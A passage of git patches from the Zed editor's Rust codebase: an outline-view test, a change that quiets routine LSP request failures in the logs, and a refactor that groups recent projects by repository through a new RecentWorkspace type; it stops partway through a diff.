+712,70 @@ mod tests { ); } + #[gpui::test] + async fn test_outline_stale_hover_index_after_matches_shrink(cx: &mut TestAppContext) { + init_test(cx); + + let mut source = String::new(); + for index in 0..69 { + source.push_str(&format!("struct Keep{index};\n")); + } + for index in 69..74 { + source.push_str(&format!("struct Drop{index};\n")); + } + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({ "a.rs": source })) + .await; + + let project = Project::test(fs, [path!("/dir").as_ref()], cx).await; + project.read_with(cx, |project, _| { + project.languages().add(language::rust_lang()) + }); + + let (workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + + let workspace = cx.read(|cx| workspace.read(cx).workspace().clone()); + let worktree_id = workspace.update(cx, |workspace, cx| { + workspace.project().update(cx, |project, cx| { + project.worktrees(cx).next().unwrap().read(cx).id() + }) + }); + let _buffer = project + .update(cx, |project, cx| { + project.open_local_buffer(path!("/dir/a.rs"), cx) + }) + .await + .unwrap(); + workspace + .update_in(cx, |workspace, window, cx| { + workspace.open_path((worktree_id, rel_path("a.rs")), None, true, window, cx) + }) + .await + .unwrap(); + + let outline_view = open_outline_view(&workspace, cx); + outline_view.read_with(cx, |outline_view, _| { + assert_eq!(outline_view.delegate.matches.len(), 74); + }); + + outline_view + .update_in(cx, |outline_view, window, cx| { + outline_view + .delegate + .update_matches("Keep".to_string(), window, cx) + }) + .await; + outline_view.read_with(cx, |outline_view, _| { + assert_eq!(outline_view.delegate.matches.len(), 69); + }); + + outline_view.update_in(cx, |outline_view, window, cx| { + outline_view.set_selected_index(73, None, false, window, cx); + }); + } + #[gpui::test] async fn test_outline_filtered_selection_prefers_first_match_on_score_ties( cx: &mut TestAppContext, From 650d19e851ed2b8cea9cbb55dc684dc5d48fa8a4 Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Tue, 5 May 2026 08:57:05 +0200 Subject: [PATCH 184/231] lsp: Reduce lsp log spam for unimportant failures (#55732) Release Notes: - N/A or Added/Fixed/Improved ... --- crates/editor/src/lsp_ext.rs | 16 ++++++---------- crates/project/src/lsp_store.rs | 23 +++++++++++++++++------ 2 files changed, 23 insertions(+), 16 deletions(-) diff --git a/crates/editor/src/lsp_ext.rs b/crates/editor/src/lsp_ext.rs index 60f0dd305ef81a..881c14903b2aa9 100644 --- a/crates/editor/src/lsp_ext.rs +++ b/crates/editor/src/lsp_ext.rs @@ -3,9 +3,9 @@ use std::time::Duration; use crate::Editor; use collections::{HashMap, HashSet}; -use futures_lite::FutureExt as _; -use gpui::AsyncApp; +use futures::TryFutureExt; use gpui::{App, Entity, Task}; +use gpui::{AsyncApp, FutureExt}; use language::Buffer; use language::Language; use lsp::LanguageServerId; @@ -172,14 +172,10 @@ pub fn lsp_tasks( } lsp_tasks.into_iter().collect() }) - .race({ - // `lsp::DEFAULT_LSP_REQUEST_TIMEOUT` is larger than we want for the modal to open fast - let timer = cx.background_executor().timer(Duration::from_millis(200)); - async move { - timer.await; - log::info!("Timed out waiting for LSP tasks"); - Vec::new() - } + .with_timeout(Duration::from_millis(200), &cx.background_executor()) + .unwrap_or_else(|_| { + log::debug!("Timed out waiting for LSP tasks"); + Vec::new() }) .await }) diff --git a/crates/project/src/lsp_store.rs b/crates/project/src/lsp_store.rs index 01aab2be7ac039..ad3344fa25a7d7 100644 --- a/crates/project/src/lsp_store.rs +++ b/crates/project/src/lsp_store.rs @@ -4148,6 +4148,12 @@ impl SymbolLocation { } } +fn should_log_lsp_request_failure(message: &str) -> bool { + // content modified is a weird failure mode of rust-analyzer + // where requests are denied before its loaded a project + message.ends_with("content modified") || message.ends_with("server cancelled the request") +} + impl LspStore { pub fn init(client: &AnyProtoClient) { client.add_entity_request_handler(Self::handle_lsp_query); @@ -5249,8 +5255,7 @@ impl LspStore { language_server.name(), err ); - // rust-analyzer likes to error with this when its still loading up - if !message.ends_with("content modified") { + if should_log_lsp_request_failure(&message) { log::warn!("{message}"); } return Task::ready(Err(anyhow!(message))); @@ -5311,8 +5316,7 @@ impl LspStore { language_server.name(), err ); - // rust-analyzer likes to error with this when its still loading up - if !message.ends_with("content modified") { + if should_log_lsp_request_failure(&message) { log::warn!("{message}"); } anyhow::anyhow!(message) @@ -7561,8 +7565,15 @@ impl LspStore { ) -> Task> { let diagnostics = self.pull_diagnostics(buffer, cx); cx.spawn(async move |lsp_store, cx| { - let Some(diagnostics) = diagnostics.await.context("pulling diagnostics")? else { - return Ok(()); + let diagnostics = match diagnostics.await { + Ok(Some(diagnostics)) => diagnostics, + Ok(None) => return Ok(()), + Err(error) if should_log_lsp_request_failure(&format!("{error:#}")) => { + return Err(error).context("pulling diagnostics"); + } + // This is a weird way to suppress diagnostic failures on server side cancellation, + // we should actually retry the request here? + Err(_) => return Ok(()), }; lsp_store.update(cx, |lsp_store, cx| { if lsp_store.as_local().is_none() { From 492a340120524645ef32116de2719ae661715bec Mon Sep 17 00:00:00 2001 From: Max Brunsfeld Date: Tue, 5 May 2026 01:21:03 -0700 Subject: [PATCH 185/231] Improve grouping of worktrees by repo in recent projects (#55715) * Perform grouping even for repositories that have no main worktree * Enable grouping for remote projects * Delete entire project groups when deleting via the recent project picker Release Notes: - Fixed a bug where each linked worktree appeared as its own entry in recent projects for repositories without main worktrees - Fixed a bug where deleting projects from the recent projects sometimes appeared to have no effect. --- crates/agent_ui/src/thread_metadata_store.rs | 21 +- crates/agent_ui/src/threads_archive_view.rs | 52 +- crates/git/src/repository.rs | 20 - crates/project/src/git_store.rs | 11 +- crates/project/src/project.rs | 7 +- crates/project/tests/integration/git_store.rs | 29 + crates/recent_projects/src/recent_projects.rs | 119 ++- .../src/sidebar_recent_projects.rs | 61 +- crates/workspace/src/history_manager.rs | 9 +- crates/workspace/src/persistence.rs | 766 ++++++++++++++---- crates/workspace/src/persistence/model.rs | 7 + crates/workspace/src/welcome.rs | 32 +- crates/workspace/src/workspace.rs | 12 +- 13 files changed, 801 insertions(+), 345 deletions(-) diff --git a/crates/agent_ui/src/thread_metadata_store.rs b/crates/agent_ui/src/thread_metadata_store.rs index fee098f3760e96..2e6c3313eba11a 100644 --- a/crates/agent_ui/src/thread_metadata_store.rs +++ b/crates/agent_ui/src/thread_metadata_store.rs @@ -200,27 +200,30 @@ fn migrate_thread_remote_connections(cx: &mut App, migration_task: Task::default(); let mut remote_path_lists = HashMap::::default(); recent_workspaces .iter() - .filter(|(_, location, path_list, _)| { - !path_list.is_empty() && matches!(location, &SerializedWorkspaceLocation::Local) + .filter(|workspace| { + !workspace.paths.is_empty() + && matches!(workspace.location, SerializedWorkspaceLocation::Local) }) - .for_each(|(_, _, path_list, _)| { - local_path_lists.insert(path_list.clone()); + .for_each(|workspace| { + local_path_lists.insert(workspace.paths.clone()); }); - for (_, location, path_list, _) in recent_workspaces { - match location { + for workspace in recent_workspaces { + match workspace.location { SerializedWorkspaceLocation::Remote(remote_connection) - if !local_path_lists.contains(&path_list) => + if !local_path_lists.contains(&workspace.paths) => { remote_path_lists - .entry(path_list) + .entry(workspace.paths) .or_insert(remote_connection); } _ => {} diff --git a/crates/agent_ui/src/threads_archive_view.rs b/crates/agent_ui/src/threads_archive_view.rs index 8f124d7233b37c..8283692887601c 100644 --- a/crates/agent_ui/src/threads_archive_view.rs +++ b/crates/agent_ui/src/threads_archive_view.rs @@ -39,8 +39,8 @@ use ui_input::ErasedEditor; use util::ResultExt; use util::paths::PathExt; use workspace::{ - CloseWindow, ModalView, PathList, SerializedWorkspaceLocation, Workspace, WorkspaceDb, - WorkspaceId, resolve_worktree_workspaces, + CloseWindow, ModalView, PathList, RecentWorkspace, SerializedWorkspaceLocation, Workspace, + WorkspaceDb, WorkspaceId, }; use zed_actions::agents_sidebar::FocusSidebarFilter; @@ -1127,7 +1127,6 @@ impl ProjectPickerModal { .await .log_err() .unwrap_or_default(); - let workspaces = resolve_worktree_workspaces(workspaces, fs.as_ref()).await; this.update_in(cx, move |this, window, cx| { this.picker.update(cx, move |picker, cx| { picker.delegate.workspaces = workspaces; @@ -1182,12 +1181,7 @@ struct ProjectPickerDelegate { archive_view: WeakEntity, current_workspace_id: Option, sibling_workspace_ids: HashSet, - workspaces: Vec<( - WorkspaceId, - SerializedWorkspaceLocation, - PathList, - DateTime, - )>, + workspaces: Vec, filtered_entries: Vec, selected_index: usize, focus_handle: FocusHandle, @@ -1332,9 +1326,10 @@ impl PickerDelegate for ProjectPickerDelegate { .workspaces .iter() .enumerate() - .filter(|(_, (id, _, _, _))| self.is_sibling_workspace(*id)) - .map(|(id, (_, _, paths, _))| { - let combined_string = paths + .filter(|(_, workspace)| self.is_sibling_workspace(workspace.workspace_id)) + .map(|(id, workspace)| { + let combined_string = workspace + .identity_paths .ordered_paths() .map(|path| path.compact().to_string_lossy().into_owned()) .collect::>() @@ -1364,11 +1359,13 @@ impl PickerDelegate for ProjectPickerDelegate { .workspaces .iter() .enumerate() - .filter(|(_, (id, _, _, _))| { - !self.is_current_workspace(*id) && !self.is_sibling_workspace(*id) + .filter(|(_, workspace)| { + !self.is_current_workspace(workspace.workspace_id) + && !self.is_sibling_workspace(workspace.workspace_id) }) - .map(|(id, (_, _, paths, _))| { - let combined_string = paths + .map(|(id, workspace)| { + let combined_string = workspace + .identity_paths .ordered_paths() .map(|path| path.compact().to_string_lossy().into_owned()) .collect::>() @@ -1406,8 +1403,8 @@ impl PickerDelegate for ProjectPickerDelegate { entries.push(ProjectPickerEntry::Header("This Window".into())); if is_empty_query { - for (id, (workspace_id, _, _, _)) in self.workspaces.iter().enumerate() { - if self.is_sibling_workspace(*workspace_id) { + for (id, workspace) in self.workspaces.iter().enumerate() { + if self.is_sibling_workspace(workspace.workspace_id) { entries.push(ProjectPickerEntry::Workspace(StringMatch { candidate_id: id, score: 0.0, @@ -1433,9 +1430,9 @@ impl PickerDelegate for ProjectPickerDelegate { entries.push(ProjectPickerEntry::Header("Recent Projects".into())); if is_empty_query { - for (id, (workspace_id, _, _, _)) in self.workspaces.iter().enumerate() { - if !self.is_current_workspace(*workspace_id) - && !self.is_sibling_workspace(*workspace_id) + for (id, workspace) in self.workspaces.iter().enumerate() { + if !self.is_current_workspace(workspace.workspace_id) + && !self.is_sibling_workspace(workspace.workspace_id) { entries.push(ProjectPickerEntry::Workspace(StringMatch { candidate_id: id, @@ -1468,11 +1465,11 @@ impl PickerDelegate for ProjectPickerDelegate { Some(ProjectPickerEntry::Workspace(hit)) => hit.candidate_id, _ => return, }; - let Some((_workspace_id, _location, paths, _)) = self.workspaces.get(candidate_id) else { + let Some(workspace) = self.workspaces.get(candidate_id) else { return; }; - self.update_working_directories_and_unarchive(paths.clone(), window, cx); + self.update_working_directories_and_unarchive(workspace.paths.clone(), window, cx); cx.emit(DismissEvent); } @@ -1504,9 +1501,11 @@ impl PickerDelegate for ProjectPickerDelegate { .into_any_element(), ), ProjectPickerEntry::Workspace(hit) => { - let (_, location, paths, _) = self.workspaces.get(hit.candidate_id)?; + let workspace = self.workspaces.get(hit.candidate_id)?; + let location = &workspace.location; - let ordered_paths: Vec<_> = paths + let ordered_paths: Vec<_> = workspace + .identity_paths .ordered_paths() .map(|p| p.compact().to_string_lossy().to_string()) .collect(); @@ -1514,7 +1513,8 @@ impl PickerDelegate for ProjectPickerDelegate { let tooltip_path: SharedString = ordered_paths.join("\n").into(); let mut path_start_offset = 0; - let match_labels: Vec<_> = paths + let match_labels: Vec<_> = workspace + .identity_paths .ordered_paths() .map(|p| p.compact()) .map(|path| { diff --git a/crates/git/src/repository.rs b/crates/git/src/repository.rs index 69910d706e40b7..d98e917d69ce59 100644 --- a/crates/git/src/repository.rs +++ b/crates/git/src/repository.rs @@ -60,26 +60,6 @@ pub const GRAPH_CHUNK_SIZE: usize = 1000; /// Default value for the `git.worktree_directory` setting. pub const DEFAULT_WORKTREE_DIRECTORY: &str = "../worktrees"; -/// Determine the original (main) repository's working directory. -/// -/// For linked worktrees, `common_dir` differs from `repository_dir` and -/// points to the main repo's `.git` directory, so we can derive the main -/// repo's working directory from it. For normal repos and submodules, -/// `common_dir` equals `repository_dir`, and the original repo is simply -/// `work_directory` itself. -pub fn original_repo_path( - work_directory: &Path, - common_dir: &Path, - repository_dir: &Path, -) -> PathBuf { - if common_dir != repository_dir { - original_repo_path_from_common_dir(common_dir) - .unwrap_or_else(|| work_directory.to_path_buf()) - } else { - work_directory.to_path_buf() - } -} - /// Given the git common directory (from `commondir()`), derive the original /// repository's working directory. /// diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index 1e347b6af489c8..20facc32640bf9 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -7917,14 +7917,17 @@ impl Repository { } /// If `path` is a git linked worktree checkout, resolves it to the main -/// repository's working directory path. Returns `None` if `path` is a normal -/// repository, not a git repo, or if resolution fails. +/// repository's identity path. For regular linked worktrees this is the main +/// repository's working directory; for linked worktrees backed by a bare repo +/// such as `.bare`, this is the parent project directory users think of as the +/// repository root. Returns `None` if `path` is a normal repository, not a git +/// repo, or if resolution fails. /// /// Resolution works by: /// 1. Reading the `.git` file to get the `gitdir:` pointer /// 2. Following that to the worktree-specific git directory /// 3. Reading the `commondir` file to find the shared `.git` directory -/// 4. Deriving the main repo's working directory from the common dir +/// 4. Deriving the main repo's identity path from the common dir pub async fn resolve_git_worktree_to_main_repo(fs: &dyn Fs, path: &Path) -> Option { let dot_git = path.join(".git"); let metadata = fs.metadata(&dot_git).await.ok()??; @@ -7941,7 +7944,7 @@ pub async fn resolve_git_worktree_to_main_repo(fs: &dyn Fs, path: &Path) -> Opti .canonicalize(&gitdir_abs.join(commondir_content.trim())) .await .ok()?; - git::repository::original_repo_path_from_common_dir(&common_dir) + Some(repo_identity_path(&common_dir).to_path_buf()) } /// Validates that the resolved worktree directory is acceptable: diff --git a/crates/project/src/project.rs b/crates/project/src/project.rs index 7cb51d4ef8a41c..4e74c4cf1fcf40 100644 --- a/crates/project/src/project.rs +++ b/crates/project/src/project.rs @@ -108,7 +108,7 @@ pub use prettier_store::PrettierStore; use project_settings::{ProjectSettings, SettingsObserver, SettingsObserverEvent}; #[cfg(target_os = "windows")] use remote::wsl_path_to_windows_path; -use remote::{RemoteClient, RemoteConnectionOptions}; +use remote::{RemoteClient, RemoteConnectionOptions, same_remote_connection_identity}; use rpc::{ AnyProtoClient, ErrorCode, proto::{LanguageServerPromptResponse, REMOTE_SERVER_PROJECT_ID}, @@ -6226,6 +6226,11 @@ impl ProjectGroupKey { pub fn host(&self) -> Option { self.host.clone() } + + pub fn matches(&self, other: &ProjectGroupKey) -> bool { + self.paths == other.paths + && same_remote_connection_identity(self.host.as_ref(), other.host.as_ref()) + } } pub fn path_suffix(path: &Path, detail: usize) -> String { diff --git a/crates/project/tests/integration/git_store.rs b/crates/project/tests/integration/git_store.rs index 2aaeb901d54b5b..3f752a279f237c 100644 --- a/crates/project/tests/integration/git_store.rs +++ b/crates/project/tests/integration/git_store.rs @@ -1666,6 +1666,35 @@ mod resolve_worktree_tests { assert_eq!(result, None); } + #[gpui::test] + async fn test_resolve_git_worktree_bare_repo_identity_path(cx: &mut TestAppContext) { + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/monty/.bare", + json!({ + "worktrees": { + "feature-a": { + "commondir": "../../", + "HEAD": "ref: refs/heads/feature-a" + } + } + }), + ) + .await; + fs.insert_tree( + "/monty/feature-a", + json!({ + ".git": "gitdir: /monty/.bare/worktrees/feature-a", + "src": { "main.rs": "" } + }), + ) + .await; + + let result = + resolve_git_worktree_to_main_repo(fs.as_ref(), Path::new("/monty/feature-a")).await; + assert_eq!(result, Some(PathBuf::from("/monty"))); + } + #[gpui::test] async fn test_resolve_git_worktree_no_git_returns_none(cx: &mut TestAppContext) { let fs = FakeFs::new(cx.executor()); diff --git a/crates/recent_projects/src/recent_projects.rs b/crates/recent_projects/src/recent_projects.rs index f5b5f78fd24e30..4b99ed37a38642 100644 --- a/crates/recent_projects/src/recent_projects.rs +++ b/crates/recent_projects/src/recent_projects.rs @@ -47,7 +47,7 @@ use ui::{ use util::{ResultExt, paths::PathExt}; use workspace::{ HistoryManager, ModalView, MultiWorkspace, OpenMode, OpenOptions, OpenVisible, PathList, - SerializedWorkspaceLocation, Workspace, WorkspaceDb, WorkspaceId, + RecentWorkspace, SerializedWorkspaceLocation, Workspace, WorkspaceDb, WorkspaceId, notifications::DetachAndPromptErr, with_active_or_new_workspace, }; use zed_actions::{OpenDevContainer, OpenRecent, OpenRemote}; @@ -102,13 +102,13 @@ pub async fn get_recent_projects( let filtered: Vec<_> = workspaces .into_iter() - .filter(|(id, _, _, _)| Some(*id) != current_workspace_id) - .filter(|(_, location, _, _)| matches!(location, SerializedWorkspaceLocation::Local)) + .filter(|workspace| Some(workspace.workspace_id) != current_workspace_id) + .filter(|workspace| matches!(workspace.location, SerializedWorkspaceLocation::Local)) .collect(); let mut all_paths: Vec = filtered .iter() - .flat_map(|(_, _, path_list, _)| path_list.paths().iter().cloned()) + .flat_map(|workspace| workspace.identity_paths.paths().iter().cloned()) .collect(); all_paths.sort(); all_paths.dedup(); @@ -121,9 +121,9 @@ pub async fn get_recent_projects( let entries: Vec = filtered .into_iter() - .map(|(workspace_id, _, path_list, timestamp)| { - let paths: Vec = path_list.paths().to_vec(); - let ordered_paths: Vec<&PathBuf> = path_list.ordered_paths().collect(); + .map(|workspace| { + let paths: Vec = workspace.paths.paths().to_vec(); + let ordered_paths: Vec<&PathBuf> = workspace.identity_paths.ordered_paths().collect(); let name = ordered_paths .iter() @@ -145,8 +145,8 @@ pub async fn get_recent_projects( name: SharedString::from(name), full_path: SharedString::from(full_path), paths, - workspace_id, - timestamp, + workspace_id: workspace.workspace_id, + timestamp: workspace.timestamp, } }) .collect(); @@ -614,7 +614,6 @@ impl RecentProjects { .await .log_err() .unwrap_or_default(); - let workspaces = workspace::resolve_worktree_workspaces(workspaces, fs.as_ref()).await; this.update_in(cx, move |this, window, cx| { this.picker.update(cx, move |picker, cx| { picker.delegate.set_workspaces(workspaces); @@ -773,11 +772,9 @@ impl RecentProjects { if let Some(ProjectPickerEntry::RecentProject(hit)) = picker.delegate.filtered_entries.get(ix) { - if let Some((_, location, paths, _)) = - picker.delegate.workspaces.get(hit.candidate_id) - { - if matches!(location, SerializedWorkspaceLocation::Local) { - let paths_to_add = paths.paths().to_vec(); + if let Some(workspace) = picker.delegate.workspaces.get(hit.candidate_id) { + if matches!(workspace.location, SerializedWorkspaceLocation::Local) { + let paths_to_add = workspace.paths.paths().to_vec(); picker .delegate .add_paths_to_project(paths_to_add, window, cx); @@ -812,12 +809,7 @@ pub struct RecentProjectsDelegate { workspace: WeakEntity, open_folders: Vec, window_project_groups: Vec, - workspaces: Vec<( - WorkspaceId, - SerializedWorkspaceLocation, - PathList, - DateTime, - )>, + workspaces: Vec, filtered_entries: Vec, selected_index: usize, render_paths: bool, @@ -860,20 +852,12 @@ impl RecentProjectsDelegate { } } - pub fn set_workspaces( - &mut self, - workspaces: Vec<( - WorkspaceId, - SerializedWorkspaceLocation, - PathList, - DateTime, - )>, - ) { + pub fn set_workspaces(&mut self, workspaces: Vec) { self.workspaces = workspaces; let has_non_local_recent = !self .workspaces .iter() - .all(|(_, location, _, _)| matches!(location, SerializedWorkspaceLocation::Local)); + .all(|workspace| matches!(workspace.location, SerializedWorkspaceLocation::Local)); self.has_any_non_local_projects = self.project_connection_options.is_some() || has_non_local_recent; } @@ -987,9 +971,10 @@ impl PickerDelegate for RecentProjectsDelegate { .workspaces .iter() .enumerate() - .filter(|(_, (id, _, paths, _))| self.is_valid_recent_candidate(*id, paths, cx)) - .map(|(id, (_, _, paths, _))| { - let combined_string = paths + .filter(|(_, workspace)| self.is_valid_recent_candidate(workspace, cx)) + .map(|(id, workspace)| { + let combined_string = workspace + .identity_paths .ordered_paths() .map(|path| path.compact().to_string_lossy().into_owned()) .collect::>() @@ -1063,8 +1048,8 @@ impl PickerDelegate for RecentProjectsDelegate { entries.push(ProjectPickerEntry::Header("Recent Projects".into())); if is_empty_query { - for (id, (workspace_id, _, paths, _)) in self.workspaces.iter().enumerate() { - if self.is_valid_recent_candidate(*workspace_id, paths, cx) { + for (id, workspace) in self.workspaces.iter().enumerate() { + if self.is_valid_recent_candidate(workspace, cx) { entries.push(ProjectPickerEntry::RecentProject(StringMatch { candidate_id: id, score: 0.0, @@ -1149,20 +1134,15 @@ impl PickerDelegate for RecentProjectsDelegate { let Some(workspace) = self.workspace.upgrade() else { return; }; - let Some(( - candidate_workspace_id, - candidate_workspace_location, - candidate_workspace_paths, - _, - )) = self.workspaces.get(selected_match.candidate_id) + let Some(candidate_workspace) = self.workspaces.get(selected_match.candidate_id) else { return; }; let replace_current_window = self.create_new_window == secondary; - let candidate_workspace_id = *candidate_workspace_id; - let candidate_workspace_location = candidate_workspace_location.clone(); - let candidate_workspace_paths = candidate_workspace_paths.clone(); + let candidate_workspace_id = candidate_workspace.workspace_id; + let candidate_workspace_location = candidate_workspace.location.clone(); + let candidate_workspace_paths = candidate_workspace.paths.clone(); workspace.update(cx, |workspace, cx| { if workspace.database_id() == Some(candidate_workspace_id) { @@ -1497,10 +1477,13 @@ impl PickerDelegate for RecentProjectsDelegate { ) } ProjectPickerEntry::RecentProject(hit) => { - let (_, location, paths, _) = self.workspaces.get(hit.candidate_id)?; + let workspace = self.workspaces.get(hit.candidate_id)?; + let location = &workspace.location; + let raw_paths = &workspace.paths; + let identity_paths = &workspace.identity_paths; let is_local = matches!(location, SerializedWorkspaceLocation::Local); - let paths_to_add = paths.paths().to_vec(); - let ordered_paths: Vec<_> = paths + let paths_to_add = raw_paths.paths().to_vec(); + let ordered_paths: Vec<_> = identity_paths .ordered_paths() .map(|p| p.compact().to_string_lossy().to_string()) .collect(); @@ -1517,7 +1500,7 @@ impl PickerDelegate for RecentProjectsDelegate { }; let mut path_start_offset = 0; - let (match_labels, paths): (Vec<_>, Vec<_>) = paths + let (match_labels, paths): (Vec<_>, Vec<_>) = identity_paths .ordered_paths() .map(|p| p.compact()) .map(|path| { @@ -1891,8 +1874,11 @@ impl PickerDelegate for RecentProjectsDelegate { Some(ProjectPickerEntry::RecentProject(hit)) => self .workspaces .get(hit.candidate_id) - .map(|(_, loc, ..)| { - matches!(loc, SerializedWorkspaceLocation::Local) + .map(|workspace| { + matches!( + workspace.location, + SerializedWorkspaceLocation::Local + ) }) .unwrap_or(false), _ => false, @@ -2129,22 +2115,23 @@ impl RecentProjectsDelegate { if let Some(ProjectPickerEntry::RecentProject(selected_match)) = self.filtered_entries.get(ix) { - let (workspace_id, _, _, _) = &self.workspaces[selected_match.candidate_id]; - let workspace_id = *workspace_id; + let recent_workspace = self.workspaces[selected_match.candidate_id].clone(); let fs = self .workspace .upgrade() .map(|ws| ws.read(cx).app_state().fs.clone()); let db = WorkspaceDb::global(cx); cx.spawn_in(window, async move |this, cx| { - db.delete_workspace_by_id(workspace_id).await.log_err(); let Some(fs) = fs else { return }; + let deleted_workspace_ids = db + .delete_recent_workspace_group(&recent_workspace) + .await + .log_err() + .unwrap_or_default(); let workspaces = db .recent_project_workspaces(fs.as_ref()) .await .unwrap_or_default(); - let workspaces = - workspace::resolve_worktree_workspaces(workspaces, fs.as_ref()).await; this.update_in(cx, move |picker, window, cx| { picker.delegate.set_workspaces(workspaces); picker @@ -2155,8 +2142,11 @@ impl RecentProjectsDelegate { // After deleting a project, we want to update the history manager to reflect the change. // But we do not emit a update event when user opens a project, because it's handled in `workspace::load_workspace`. if let Some(history_manager) = HistoryManager::global(cx) { - history_manager - .update(cx, |this, cx| this.delete_history(workspace_id, cx)); + history_manager.update(cx, |this, cx| { + for workspace_id in &deleted_workspace_ids { + this.delete_history(*workspace_id, cx); + } + }); } }) .ok(); @@ -2209,10 +2199,10 @@ impl RecentProjectsDelegate { false } - fn is_in_current_window_groups(&self, paths: &PathList) -> bool { + fn is_in_current_window_groups(&self, workspace: &RecentWorkspace) -> bool { self.window_project_groups .iter() - .any(|key| key.path_list() == paths) + .any(|key| key.matches(&workspace.project_group_key())) } fn is_open_folder(&self, paths: &PathList) -> bool { @@ -2233,13 +2223,12 @@ impl RecentProjectsDelegate { fn is_valid_recent_candidate( &self, - workspace_id: WorkspaceId, - paths: &PathList, + workspace: &RecentWorkspace, cx: &mut Context>, ) -> bool { - !self.is_current_workspace(workspace_id, cx) - && !self.is_in_current_window_groups(paths) - && !self.is_open_folder(paths) + !self.is_current_workspace(workspace.workspace_id, cx) + && !self.is_in_current_window_groups(workspace) + && !self.is_open_folder(&workspace.paths) } } diff --git a/crates/recent_projects/src/sidebar_recent_projects.rs b/crates/recent_projects/src/sidebar_recent_projects.rs index f19531c7070526..495907d3934b4a 100644 --- a/crates/recent_projects/src/sidebar_recent_projects.rs +++ b/crates/recent_projects/src/sidebar_recent_projects.rs @@ -1,6 +1,5 @@ use std::sync::Arc; -use chrono::{DateTime, Utc}; use fuzzy_nucleo::{StringMatch, StringMatchCandidate, match_strings}; use gpui::{ Action, AnyElement, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, @@ -16,8 +15,8 @@ use ui::{ButtonLike, KeyBinding, ListItem, ListItemSpacing, Tooltip, prelude::*} use ui_input::ErasedEditor; use util::{ResultExt, paths::PathExt}; use workspace::{ - MultiWorkspace, OpenMode, OpenOptions, PathList, ProjectGroupKey, SerializedWorkspaceLocation, - Workspace, WorkspaceDb, WorkspaceId, notifications::DetachAndPromptErr, + MultiWorkspace, OpenMode, OpenOptions, ProjectGroupKey, RecentWorkspace, + SerializedWorkspaceLocation, Workspace, WorkspaceDb, notifications::DetachAndPromptErr, }; use zed_actions::OpenRemote; @@ -74,8 +73,6 @@ impl SidebarRecentProjects { .await .log_err() .unwrap_or_default(); - let workspaces = - workspace::resolve_worktree_workspaces(workspaces, fs.as_ref()).await; this.update_in(cx, move |this, window, cx| { this.picker.update(cx, move |picker, cx| { picker.delegate.set_workspaces(workspaces); @@ -116,12 +113,7 @@ impl Render for SidebarRecentProjects { pub struct SidebarRecentProjectsDelegate { workspace: WeakEntity, window_project_groups: Vec, - workspaces: Vec<( - WorkspaceId, - SerializedWorkspaceLocation, - PathList, - DateTime, - )>, + workspaces: Vec, filtered_workspaces: Vec, selected_index: usize, has_any_non_local_projects: bool, @@ -129,18 +121,10 @@ pub struct SidebarRecentProjectsDelegate { } impl SidebarRecentProjectsDelegate { - pub fn set_workspaces( - &mut self, - workspaces: Vec<( - WorkspaceId, - SerializedWorkspaceLocation, - PathList, - DateTime, - )>, - ) { + pub fn set_workspaces(&mut self, workspaces: Vec) { self.has_any_non_local_projects = workspaces .iter() - .any(|(_, location, _, _)| !matches!(location, SerializedWorkspaceLocation::Local)); + .any(|workspace| !matches!(workspace.location, SerializedWorkspaceLocation::Local)); self.workspaces = workspaces; } } @@ -206,15 +190,16 @@ impl PickerDelegate for SidebarRecentProjectsDelegate { .workspaces .iter() .enumerate() - .filter(|(_, (id, _, paths, _))| { - Some(*id) != current_workspace_id + .filter(|(_, workspace)| { + Some(workspace.workspace_id) != current_workspace_id && !self .window_project_groups .iter() - .any(|key| key.path_list() == paths) + .any(|key| key.matches(&workspace.project_group_key())) }) - .map(|(id, (_, _, paths, _))| { - let combined_string = paths + .map(|(id, workspace)| { + let combined_string = workspace + .identity_paths .ordered_paths() .map(|path| path.compact().to_string_lossy().into_owned()) .collect::>() @@ -251,9 +236,7 @@ impl PickerDelegate for SidebarRecentProjectsDelegate { let Some(hit) = self.filtered_workspaces.get(self.selected_index) else { return; }; - let Some((_, location, candidate_workspace_paths, _)) = - self.workspaces.get(hit.candidate_id) - else { + let Some(recent_workspace) = self.workspaces.get(hit.candidate_id) else { return; }; @@ -261,10 +244,10 @@ impl PickerDelegate for SidebarRecentProjectsDelegate { return; }; - match location { + match &recent_workspace.location { SerializedWorkspaceLocation::Local => { if let Some(handle) = window.window_handle().downcast::() { - let paths = candidate_workspace_paths.paths().to_vec(); + let paths = recent_workspace.paths.paths().to_vec(); cx.defer(move |cx| { if let Some(task) = handle .update(cx, |multi_workspace, window, cx| { @@ -290,7 +273,7 @@ impl PickerDelegate for SidebarRecentProjectsDelegate { crate::RemoteSettings::get_global(cx) .fill_connection_options_from_settings(connection); }; - let paths = candidate_workspace_paths.paths().to_vec(); + let paths = recent_workspace.paths.paths().to_vec(); cx.spawn_in(window, async move |_, cx| { open_remote_project(connection.clone(), paths, app_state, open_options, cx) .await @@ -326,14 +309,15 @@ impl PickerDelegate for SidebarRecentProjectsDelegate { cx: &mut Context>, ) -> Option { let hit = self.filtered_workspaces.get(ix)?; - let (_, location, paths, _) = self.workspaces.get(hit.candidate_id)?; + let workspace = self.workspaces.get(hit.candidate_id)?; - let ordered_paths: Vec<_> = paths + let ordered_paths: Vec<_> = workspace + .identity_paths .ordered_paths() .map(|p| p.compact().to_string_lossy().to_string()) .collect(); - let tooltip_path: SharedString = match &location { + let tooltip_path: SharedString = match &workspace.location { SerializedWorkspaceLocation::Remote(options) => { let host = options.display_name(); if ordered_paths.len() == 1 { @@ -346,7 +330,8 @@ impl PickerDelegate for SidebarRecentProjectsDelegate { }; let mut path_start_offset = 0; - let match_labels: Vec<_> = paths + let match_labels: Vec<_> = workspace + .identity_paths .ordered_paths() .map(|p| p.compact()) .map(|path| { @@ -357,7 +342,7 @@ impl PickerDelegate for SidebarRecentProjectsDelegate { }) .collect(); - let prefix = match &location { + let prefix = match &workspace.location { SerializedWorkspaceLocation::Remote(options) => { Some(SharedString::from(options.display_name())) } @@ -371,7 +356,7 @@ impl PickerDelegate for SidebarRecentProjectsDelegate { active: false, }; - let icon = icon_for_remote_connection(match location { + let icon = icon_for_remote_connection(match &workspace.location { 